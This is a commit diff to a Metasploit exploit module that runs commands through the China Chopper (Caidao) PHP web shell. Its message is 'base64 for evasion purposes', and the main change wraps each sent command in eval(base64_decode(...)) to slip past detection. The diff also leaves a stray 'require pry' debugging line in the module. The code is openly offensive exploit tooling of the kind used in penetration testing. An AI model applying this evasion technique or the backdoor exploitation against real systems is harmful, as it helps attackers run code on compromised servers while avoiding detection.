base64 for evasion purposes

2015-11-03 06:42:52 +00:00 · 2015-11-03 06:42:52 +00:00 · 46fe0c0899
parent 6c16d2a1ca
commit 46fe0c0899
1 changed files with 3 additions and 1 deletions
--- a/modules/exploits/multi/http/caidao_php_backdoor_exec.rb
+++ b/modules/exploits/multi/http/caidao_php_backdoor_exec.rb
@ -5,6 +5,7 @@
 ##

 require 'msf/core'
+require 'pry'

 class Metasploit4 < Msf::Exploit::Remote
  Rank = ExcellentRanking
@ -26,7 +27,7 @@ class Metasploit4 < Msf::Exploit::Remote
        ],
      'Payload'           =>
        {
-          'BadChars'      => '\x00',
+          'BadChars'      => '\x00'
        },
      'Platform'          => ['php'],
      'Arch'              => ARCH_PHP,
@ -46,6 +47,7 @@ class Metasploit4 < Msf::Exploit::Remote
  end

  def http_send_command(code)
+    code = "eval(base64_decode(\"#{Rex::Text.encode_base64(code)}\"));"
    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path),